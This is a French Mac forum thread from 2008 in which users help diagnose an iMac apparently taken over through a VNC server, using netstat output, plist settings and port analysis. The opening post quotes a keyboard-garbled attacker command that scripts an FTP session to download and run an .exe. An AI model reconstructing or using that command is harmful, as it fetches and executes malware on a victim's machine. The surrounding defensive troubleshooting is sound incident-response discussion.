Un iMac Hacké ?, il se passe de drôles de trucs

[Ponchan]

Bonjour les bidouilleurs.
Oui, je sais, cette question revient régulièrement sur les forums mais ce qui arrive à ma collègue est assez étrange.
Alors voilà,
Plusieurs fois, alors qu'elle travaillait sous Word, elle eu la surprise de voir apparaitre le texte suivant :

C,d =c echo open !é :é »& :&éà :!ç & !§ç§ :: uèecho user q b :: uèecho binqry :: uèecho get h,, :exe :: uèecho auit :: uèftp :exe )n )smuèh,, :exe èexit

Je précise tout de suite qu'elle n'a aucune connaissance en informatique et que sa maison n'est pas construite sur un cimetière Indien.
Çà ressemble à une commande terminal mais je serais bien incapable de la lire.

Autre chose est arrivé hier, la souris a pris le contrôle de l'ordinateur, ouvert et refermé des documents etc.
Ce qui est étrange car VNC n'était pas activé à ce moment là.

Aujourd'hui, son mac émet des bruits genre 'boinc'.

Bref, son Mac est hanté.

Matériel : iMac Intel 17", Tiger, plusieurs sessions d'utilisateur... utilisant MSN.

Je vais aller y faire un tour histoire de changer les mots de passe, vérifier le firewall, rechercher d'hypothétiques virus, procéder aux mises à jour...

Mais vous en pensez quoi ? Quels outils puis-je utiliser pour nettoyer tout ça ? Et comment s'assurer que cela n'arrive plus ?

Ce message a été modifié par Ponchan - 8 Jan 2008, 15:56.

[Mohirei]

Bonjour ,

une petite recherche (avec les mots-clé echo open par exemple) te renverra vers quelques topics qui proposent des pistes de résolution

[Ponchan]

Merci Mohirei !
Effectivement, cette recherche commence à porter ses fruits. Je vais vérifier quelle version de VNC j'ai installé, voir si elle se lance automatiquement au démarrage d'une des sessions, vérifier le mot de passe, vérifier les logs et combler les brèches.
J'ai du baisser ma garde en switchant. Sous Windows, j'étais tellement parano que je n'aurai pas laissé passer un truc pareil.
D'autres avis sur la fonction de cette commande ?

[darenzana]

=> http://forum.macbidouille.com/index.php?s=...t&p=2191192

[Ponchan]

Merci Darenzana,
C'est exactement le forum que je viens d'éplucher.
Le mec qui a installé ce Mac va m'entendre.
C'est moi je crois...
Je vais essayer tout ça la semaine prochaine.
Je vous tiens au courant.

[Ponchan]

Je fais un petit up suite à mon intervention sur le Mac hanté de ma collègue.
- J'ai mis à jour Mac OS, vine Server et tous les programmes.
- J'ai désactivé ARD (oups)
- J'ai changé tous le mots de passe de sessions, réparé les autorisations.
- J'ai cherché et éliminé d'éventuels .exe qui trainaient : WLinstaller.exe et PresentationMessenger-Bom.exe
- J'ai changé l'adresse IP de la machine
- Paramétré le Firewall pour laisser entrer VNC (ça me sert), et la Freebox pour rediriger les plages de VNC.

Je fais un test de VNC, ça fonctionne.
Je quitte VNC

J'attends un peu

Et... la souris bouge toute seule.
Le hackeur lance Firefox, se plante un peu avec le clavier azerty et se rend sur www.lowratevoip.com
Je débranche le cable réseau avant qu'il ne se connecte.

Je prend mon courage à deux mains et je lance la console pour essayer de trouver qui s'est connecté.
Je trouve pas mais je lit : "/Library/StartupItems/OSXvnc/OSXvnc-server: CGSLookupServerPort: _CGSSessionDeathWatchPort(gSessionPort) returns 268435459"
Je cherche et détruit ce dossier.
Pour le moment tout va bien.

D'autres idées ??

[Fabricius]

Sauvegarde les données de la machine et fait un bon formatage avec réinstallation de la machine .

Dommage que je ne sois pas sur ma machine sinon je pense qu'il y à bien des moyens pour savoir qui ce connecte .

En attendant désactive si possible tout ce qui est VNC car il est clair que le problème vient de là .

Fabricius

[Ponchan]

Mouaip. J'ai laissé les CD d'install au bureau...

Je précise que quand le hack commence, ni VNC ni ARD ne sont activés.

[Fabricius]

Mouaip. J'ai laissé les CD d'install au bureau...

Je précise que quand le hack commence, ni VNC ni ARD ne sont activés.

Humm... peut-être une faille alors, et si le mac n'est pas connecté au réseau ? Je suppose que le problème ne ce produit plus ! ?

Et si tu changes les ports VNC que tu utilises il me semble 5900 par défaut et que tu utilises un autre port libre et que bien sur tu fais bloqué au firewall le port 5900 avec de la chance le hacker n'ira pas plus loin .

Enfin bon un sujet que je vais suivre de près .

Fabricius

[uzboxberg]

Probablement rien à voir, mais il y a eu ici-même des rapports sur des souris (disons plutôt le curseur) qui bougent toutes seules, et ceci dû au téléphone portable posé à côté de l'ordi.

salut, Uz

[Ponchan]

En dégageant ce petit fichier /Library/StartupItems/OSXvnc/OSXvnc-server le problème a l'air d'être résolu.
Je serais assez curieux de comprendre comment ce hacker s'y est pris pour l'installer.
A-t-il trouvé une faille dans ma config d'ARD ?
Est-il passé par MSN (ce que je suppose) ?

Ce que je sais, c'est qu'il a réussi à prendre le contrôle de la machine et a essayé de taper de la commande et d'utiliser lowratevoip.com
En 15 ans d'Internet, j'avais jamais vu ça.
Le Mac est sous observation, je vous tiens au jus si ça recommence.

[chombier]

En dégageant ce petit fichier /Library/StartupItems/OSXvnc/OSXvnc-server le problème a l'air d'être résolu.
Je serais assez curieux de comprendre comment ce hacker s'y est pris pour l'installer.

Quelle est la version de ton Serveur VNC ?
Les versions 4.x sont victimes d'une faille de sécurité, peut-être exploitable sur MacOS, a moins que ton mot de passe VNC ne soit bien trop simple ?
Autre question: pourquoi avoir installé un serveur VNC tiers, alors que ARD embarque le sien ?

[Ponchan]

Chombier,
J'utilise la dernière version de Vine Server 3.0
Mon mot de passe est assez compliqué mais peut-être pas assez.
J'utilise un server tiers parcequ'en tant que switcher, j'ai appris à ne pas faire confiance aux solutions embarquées dans les OS et aussi parce que je préfère avoir un programme à part, paramétrable à ma façon et lancé à la demande.

Je reviens sur un truc, VNC n'était pas lancé quand l'ordi s'est fait hacké. Je penche plutôt pour un code malveillant dissimulé dans un .exe ou un film.

[darenzana]

Je reviens sur un truc, VNC n'était pas lancé quand l'ordi s'est fait hacké. Je penche plutôt pour un code malveillant dissimulé dans un .exe ou un film.

Bin si, OSXVNC-Server etait lancé, puisque tu nous indiques qu'il a écrit des messages dans la console, et que tu as supprimé son fichier de démarrage par la suite.

Ce message a été modifié par darenzana - 16 Jan 2008, 16:16.

[chombier]

J'utilise un server tiers parcequ'en tant que switcher, j'ai appris à ne pas faire confiance aux solutions embarquées dans les OS.

Si tu pousses un peu plus loin ta réfléxion, faut pas utiliser MacOSX mais Linux alors...

Je reviens sur un truc, VNC n'était pas lancé quand l'ordi s'est fait hacké. Je penche plutôt pour un code malveillant dissimulé dans un .exe ou un film.

Le bundle /Library/StartupItems/OSXvnc/OSXvnc-server que tu as mis en quarantaine était sûrement chargé de lancer ce serveur au démarrage.
Pour vérifier quels sont les ports TCP sur lesquels ton mac est en attente de connexion, tu peux te servir de la commande "netstat -an | grep LISTEN".
D'ailleurs, pourrais tu regarder dans le fichier plist de ce bundle OSXvnc-server quelle est l'application lancée ?Ou poster ici le contenu de ce fichier ?

Ce message a été modifié par chombier - 16 Jan 2008, 16:21.

[Ponchan]

Si tu pousses un peu plus loin ta réfléxion, faut pas utiliser MacOSX mais Linux alors...

Le bundle /Library/StartupItems/OSXvnc/OSXvnc-server que tu as mis en quarantaine était sûrement chargé de lancer ce serveur au démarrage.
Pour vérifier quels sont les ports TCP sur lesquels ton mac est en attente de connexion, tu peux te servir de la commande "netstat -an | grep LISTEN".
D'ailleurs, pourrais tu regarder dans le fichier plist de ce bundle OSXvnc-server quelle est l'application lancée ?Ou poster ici le contenu de ce fichier ?

Oui, rhoo. Bon, ça va, c'est un vieux réflexe de switcher. J'essaie de me soigner...
Je vais essayer de chercher tes infos... en me connectant par VNC...

Darenzana, OSXServer c'est le server VNC de Mac OS ?
Dans ce cas, il était effectivement lancé. Mais pas Vine Server.

[chombier]

Oui, rhoo. Bon, ça va, c'est un vieux réflexe de switcher. J'essaie de me soigner...
Je vais essayer de chercher tes infos... en me connectant par VNC...

Darenzana, OSXServer c'est le server VNC de Mac OS ?
Dans ce cas, il était effectivement lancé. Mais pas Vine Server.

OSXvnc-server, c'est un serveur tiers qui a été installé. Celui d'Apple, c'est AppleVNCServer.
Sur Tiger, il se démarre via les préférences Système -> Partage -> Apple Remote Desktop -> Bouton Autorisations D'accès.

[Ponchan]

Merci pour ces précisions Chombier.
J'ai désactivé le serveur VNC d'Apple.
OSXvnc-server c'est l'autre nom de Vine Server.
Ce qui est bizarre, c'est que le bundle se lançait mais pas l'application.
Pour le moment, je ne peux pas me connecter chez ma collègue parce qu'elle n'a pas lancé le serveur VNC...

[chombier]

Ce qui est bizarre, c'est que le bundle se lançait mais pas l'application.

Les élément placés dans /Library/StartupItems sont juste des scripts de démarrage qui pointent vers les programmes à lancer. Un tel programme peut être un démon sans aucune interface utilisateur. C'est pour cette raison que je voulais voir le contenu de OSXvnc-server, pour vérifier quelle application est lancée...

[Ponchan]

Une précision, le bundle /Library/StartupItems/OSXvnc/OSXvnc-server
c'est le system server de Vine server (je crois qu'il permet de lancer le serveur dans plusieurs sessions).
Il reste actif même en cas de désinstallation du programme si on a pas pensé à le désactiver.
[EDIT voilà le travail (attention, c'est long)
Le server de la mort…
/Library/StartupItems/OSXvnc/OSXvnc-server: CGSLookupServerPort: _CGSSessionDeathWatchPort(gSessionPort) returns 268435459

Les ports ouverts
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 Le forward du port de VNC Mon adresse IP.49263 ESTABLISHED
tcp4 0 0 *.5901 *.* LISTEN
tcp46 0 0 *.5901 *.* LISTEN
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.3831 *.* LISTEN
C'est quoi ça ?:
tcp4 64065 0 192.168.6.20.49432 212.203.66.98.8000 ESTABLISHED

tcp4 0 0 *.3689 *.* LISTEN
tcp4 0 0 *.3874 *.* LISTEN
tcp4 0 0 127.0.0.1.1033 127.0.0.1.1015 ESTABLISHED
tcp4 0 0 127.0.0.1.1015 127.0.0.1.1033 ESTABLISHED
tcp4 0 0 127.0.0.1.631 *.* LISTEN
tcp4 0 0 127.0.0.1.1033 127.0.0.1.1016 ESTABLISHED
tcp4 0 0 127.0.0.1.1016 127.0.0.1.1033 ESTABLISHED
tcp4 0 0 127.0.0.1.1033 127.0.0.1.1021 ESTABLISHED
tcp4 0 0 127.0.0.1.1021 127.0.0.1.1033 ESTABLISHED
tcp4 0 0 127.0.0.1.1033 *.* LISTEN
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.2222 *.*
udp4 0 0 *.5353 *.*
udp4 0 0 *.631 *.*
udp4 0 0 192.168.6.20.123 *.*
udp6 0 0 fe80:4::217:f2ff.123 *.*
udp6 0 0 fe80:1::1.123 *.*
udp6 0 0 ::1.123 *.*
udp4 0 0 127.0.0.1.123 *.*
udp6 0 0 *.123 *.*
udp4 0 0 *.123 *.*
udp4 0 0 127.0.0.1.49163 127.0.0.1.1022
udp4 0 0 127.0.0.1.49162 127.0.0.1.1022
udp4 0 0 127.0.0.1.1022 *.*
udp4 0 0 127.0.0.1.49156 127.0.0.1.1023
udp4 0 0 127.0.0.1.1023 *.*
udp6 0 0 *.5353 *.*
udp4 0 0 *.5353 *.*
udp4 0 0 127.0.0.1.1033 *.*
udp4 0 0 *.* *.*
icm6 0 0 *.* *.*

Active LOCAL (UNIX) domain sockets
Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
368a3b8 stream 0 0 0 368a440 0 0 /var/run/mDNSResponder
368a440 stream 82 0 0 368a3b8 0 0
368a6e8 stream 0 0 0 368a770 0 0 /var/run/mDNSResponder
368a770 stream 0 0 0 368a6e8 0 0
368a7f8 stream 0 0 0 368a880 0 0 /var/run/mDNSResponder
368a880 stream 0 0 0 368a7f8 0 0
368a908 stream 0 0 0 368a990 0 0 /var/run/mDNSResponder
368a990 stream 0 0 0 368a908 0 0
368aa18 stream 0 0 0 368aaa0 0 0 /var/run/mDNSResponder
368aaa0 stream 0 0 0 368aa18 0 0
368ab28 stream 0 0 0 368abb0 0 0 /var/run/mDNSResponder
368abb0 stream 0 0 0 368ab28 0 0
368ad48 stream 0 0 0 368add0 0 0 /var/run/mDNSResponder
368add0 stream 0 0 0 368ad48 0 0
368aee0 stream 0 0 0 368af68 0 0 /Users/catherine/Library/Caches/Acrobat/7.0/Organizer70
368af68 stream 0 0 0 368aee0 0 0
2e8b088 stream 0 0 387fbdc 0 0 0 /Users/catherine/Library/Caches/Acrobat/7.0/Organizer70
2e8b220 stream 0 0 0 2e8b110 0 0 /Users/catherine/Library/Caches/Acrobat/7.0/Organizer70
2e8b110 stream 0 0 0 2e8b220 0 0
2e8b330 stream 0 0 387fc60 0 0 0 /Users/catherine/Library/Caches/Acrobat/7.0/Organizer70
2e8b198 stream 0 0 0 2e8b2a8 0 0 /var/tmp/SCDynamicStoreNotifyFileDescriptor-23811
2e8b2a8 stream 0 0 0 2e8b198 0 0
2e8b4c8 stream 0 0 0 2e8b550 0 0 /var/run/mDNSResponder
2e8b550 stream 0 0 0 2e8b4c8 0 0
2e8b5d8 stream 0 0 0 2e8b660 0 0 /var/run/mDNSResponder
2e8b660 stream 0 0 0 2e8b5d8 0 0
2e8b6e8 stream 0 0 0 2e8b770 0 0 /var/run/mDNSResponder
2e8b770 stream 0 0 0 2e8b6e8 0 0
2e8b7f8 stream 0 0 0 2e8b880 0 0 /var/run/mDNSResponder
2e8b880 stream 0 0 0 2e8b7f8 0 0
2e8baa0 stream 0 0 0 2e8b908 0 0 /var/run/mDNSResponder
2e8b908 stream 0 0 0 2e8baa0 0 0
2e8b990 stream 0 0 0 2e8ba18 0 0 /var/run/usbmuxd
2e8ba18 stream 0 0 0 2e8b990 0 0
2898110 stream 0 0 0 2e8bbb0 0 0
2e8bbb0 stream 0 0 0 2898110 0 0
2e8be58 stream 0 0 0 2e8bc38 0 0 /var/run/usbmuxd
2e8bc38 stream 0 0 0 2e8be58 0 0
2e8bee0 stream 0 0 2ec3dec 0 0 0 /private/var/run/cupsd
2898440 stream 0 0 0 28984c8 0 0 /var/run/mDNSResponder
28984c8 stream 0 0 0 2898440 0 0
28987f8 stream 0 0 2d2bc60 0 0 0 /var/run/pppconfd
2898dd0 stream 0 0 0 2898b28 0 0 /var/run/asl_input
2898b28 stream 0 0 0 2898dd0 0 0
2898bb0 stream 0 0 2c715ac 0 0 0 /var/run/asl_input
2898cc0 stream 0 0 2c719cc 0 0 0 /var/run/mDNSResponder
2898e58 stream 0 0 2c2d7bc 0 0 0 /var/run/usbmuxd
2898ee0 stream 0 0 2c2d840 0 0 0 /var/run/portmap.socket
2898f68 stream 0 0 2897ef4 0 0 0 /var/launchd/0/sock
368a2a8 dgram 0 0 0 368a330 368a330 0
368a330 dgram 0 0 0 368a2a8 368a2a8 0
368a4c8 dgram 0 0 0 368a550 368a550 0
368a550 dgram 0 0 0 368a4c8 368a4c8 0
368a5d8 dgram 0 0 0 368a660 368a660 0
368a660 dgram 0 0 0 368a5d8 368a5d8 0
368ac38 dgram 0 0 0 368acc0 368acc0 0
368acc0 dgram 0 0 0 368ac38 368ac38 0
368ae58 dgram 0 0 0 2e8b000 2e8b000 0
2e8b000 dgram 0 0 0 368ae58 368ae58 0
2e8b3b8 dgram 0 0 0 2e8b440 2e8b440 0
2e8b440 dgram 0 0 0 2e8b3b8 2e8b3b8 0
2e8bb28 dgram 0 0 0 28986e8 28986e8 0
28986e8 dgram 0 0 0 2e8bb28 2e8bb28 0
2e8bdd0 dgram 0 0 0 2898198 2898198 0
2898198 dgram 0 0 0 2e8bdd0 2e8bdd0 0
2e8bcc0 dgram 0 0 0 2e8bd48 2e8bd48 0
2e8bd48 dgram 0 0 0 2e8bcc0 2e8bcc0 0
2898220 dgram 0 0 0 2898a18 0 2898088
2898088 dgram 0 0 0 2898a18 0 2e8bf68
2e8bf68 dgram 0 0 0 2898a18 0 2898000
2898000 dgram 0 0 0 2898a18 0 28982a8
28982a8 dgram 0 0 0 2898a18 0 2898660
2898330 dgram 0 0 0 28983b8 28983b8 0
28983b8 dgram 0 0 0 2898330 2898330 0
2898550 dgram 0 0 0 28985d8 28985d8 0
28985d8 dgram 0 0 0 2898550 2898550 0
2898660 dgram 0 0 0 2898a18 0 2898770
2898770 dgram 0 0 0 2898a18 0 2898908
2898908 dgram 0 0 0 2898a18 0 2898880
2898880 dgram 0 0 0 2898a18 0 2898990
2898990 dgram 0 0 0 2898a18 0 2898aa0
2898aa0 dgram 0 0 0 2898a18 0 0
2898a18 dgram 0 0 2c71210 0 2898220 0 /var/run/syslog
2898c38 dgram 0 0 0 2898d48 2898d48 0
2898d48 dgram 0 0 0 2898c38 2898c38 0
[Skarn:~] catherin%

Le contenu du fichier plist d’OSXserver

• serverKeepAlive 1
• terminateOnFastUserSwitch 0
• disableRichClipboard 0
• Converted 1
• localhostOnly 0
• allowPressModsForKeys 0
• allowSleep 0
• NSWindow Frame Vine Server 990 232 432 407 0 0 1440 878
• desktopName catherine (Skarn.local)
• sharingMode 0
• NSWindow Frame Server Panel 990 232 432 407 0 0 1440 878
• portNumber 0
• startServerOnLaunch 1
• disableRemoteEvents 0
• dontDisconnectClients 1
• allowDimming 1
• showMouse 0
• allowScreenSaver 1
• allowRendezvous 1
• swapButtons 1
• allowKeyboardLoading 0

]
Je suis preneur pour l'explication de texte parceque j'y benne pas grand chose.
Merci les gars !

Ce message a été modifié par Ponchan - 16 Jan 2008, 17:47.

[darenzana]

Quelle version, le Vine server installé?

Plutot que la commande netstat, fais plutot un 'lsof -i -n -P' ; ça te donnera en plus le nom du processus qui écoute sur tel ou tel port.

PS : t'as vachement raison de t'enquiquiner avec des outils tiers, alors qu'avec ARD, il suffit de tenir le système a jour pour ne pas être inquiet...

[Ponchan]

Quelle version, le Vine server installé?

Plutot que la commande netstat, fais plutot un 'lsof -i -n -P' ; ça te donnera en plus le nom du processus qui écoute sur tel ou tel port.

PS : t'as vachement raison de t'enquiquiner avec des outils tiers, alors qu'avec ARD, il suffit de tenir le système a jour pour ne pas être inquiet...

Oui bon... Promis, je vais essayer avec ARD la prochaine fois...
Pas taper s'il vous plait.

Vine Server c'est la version 3
J'essaierai ta commmande demain.

[chombier]

tcp4 0 0 *.5901 *.* LISTEN

Déjà, ça, c'est pas bon. Il est possible que tu aies deux serveurs VNC lancés en parallèle, et la seconde instance, ne pouvant écouter sur le port 5900 déjà utilisé par la première, se replie sur 5901.

C'est quoi ça ?:
tcp4 64065 0 192.168.6.20.49432 212.203.66.98.8000 ESTABLISHED

Apparemment, c'est un serveur SHOUTcast: http://212.203.66.98:8000/

tcp4 0 0 *.3689 *.* LISTEN
tcp4 0 0 *.3874 *.* LISTEN

Là, aucune idée.

Le contenu du fichier plist d’OSXserver

• serverKeepAlive 1
• terminateOnFastUserSwitch 0
• disableRichClipboard 0
• Converted 1
• localhostOnly 0
• allowPressModsForKeys 0
• allowSleep 0
• NSWindow Frame Vine Server 990 232 432 407 0 0 1440 878
• desktopName catherine (Skarn.local)
• sharingMode 0
• NSWindow Frame Server Panel 990 232 432 407 0 0 1440 878
• portNumber 0
• startServerOnLaunch 1
• disableRemoteEvents 0
• dontDisconnectClients 1
• allowDimming 1
• showMouse 0
• allowScreenSaver 1
• allowRendezvous 1
• swapButtons 1
• allowKeyboardLoading 0

]
Je suis preneur pour l'explication de texte parceque j'y benne pas grand chose.
Merci les gars !

startServerOnLaunch 1 indique que le serveur VNS est lancé au démarrage.
Pour plus de sécurité, je passerais par un tunnel ssh et je changerais l'option localhostOnly en 1, comme ça, personne ne pourra se connecter sur VNC de l'extérieur.

[darenzana]

C'est quoi ça ?:
tcp4 64065 0 192.168.6.20.49432 212.203.66.98.8000 ESTABLISHED

Un serveur shoutcast : http://212.203.66.98:8000/
Ta collègue écoute une radio en ligne, c'est pas grave

Le port 5901 en dessous, c'est un serveur VNC
Le 3831, connais pas.
3689 : partage iTunes
3874: Connais pas non plus.

Mais pas la peine de trop chercher, si le seul port que tu forwarde à travers le routeur est celui que tu utilises pour VineServer, c'est le seul accesible de l'extérieur donc les attaques ne peuvent arriver que par la , a moins d'un malware qui initierait des connexions vers l'extérieur, mais il n'en existe pas (encore de connus) sur OS X.

Ce message a été modifié par darenzana - 16 Jan 2008, 18:11.

[chombier]

Le port 5901 en dessous, c'est un serveur VNC

Tu ne trouves pas bizarre qu'il y ait deux serveurs VNC ?

[darenzana]

Le port 5901 en dessous, c'est un serveur VNC

Tu ne trouves pas bizarre qu'il y ait deux serveurs VNC ?

Je n'en vois qu'un, qui écoute sur le port 5901 en IPv4 et en IPv6. Non?

[chombier]

Je n'en vois qu'un, qui écoute sur le port 5901 en IPv4 et en IPv6. Non?

C'est parce que tu as loupé cette ligne:

CODE

tcp4 0 0 Le forward du port de VNC Mon adresse IP.49263 ESTABLISHED

Ponchan est connecté en VNC sur le port 5900 (d'après ce que j'ai compris), et en plus, il y a un listener sur 5901.

[darenzana]

Je n'en vois qu'un, qui écoute sur le port 5901 en IPv4 et en IPv6. Non?

C'est parce que tu as loupé cette ligne:

CODE

tcp4 0 0 Le forward du port de VNC Mon adresse IP.49263 ESTABLISHED

Ponchan est connecté en VNC sur le port 5900 (d'après ce que j'ai compris), et en plus, il y a un listener sur 5901.

J'ai pensé qu'il était connecté sur le 5901, puisqu'on ne voit pas de listener sur le 5900 justement Ponchan, tu te connectes sur quel port?
Il est pas mullti-session VNC? Des qu'un utilisateur est connecté, il n'écoute plus?

Ce message a été modifié par darenzana - 16 Jan 2008, 18:37.

[chombier]

J'ai pensé qu'il était connecté sur le 5901, puisqu'on ne voit pas de listener sur le 5900 justement

Je ne fais que supposer, vu qu'il a masqué le port

Il est pas mullti-session VNC? Des qu'un utilisateur est connecté, il n'écoute plus?

Bah rien ne l'empêche de continuer à écouter sur le port 5900 pour d'éventuelles sessions supplémentaires, pourquoi l'incrémenter ? et en plus sans prévenir ?

[darenzana]

Au fait, tu as redémarré après avoir suprimé /Library/StartupItems/OSXvnc/OSXvnc-server ?

Bah rien ne l'empêche de continuer à écouter sur le port 5900 pour d'éventuelles sessions supplémentaires, pourquoi l'incrémenter ? et en plus sans prévenir ?

On est d'accord; dans mon hypothèse il écoute sur le port 5901 pour toutes les connexions, donc il ne change pas de port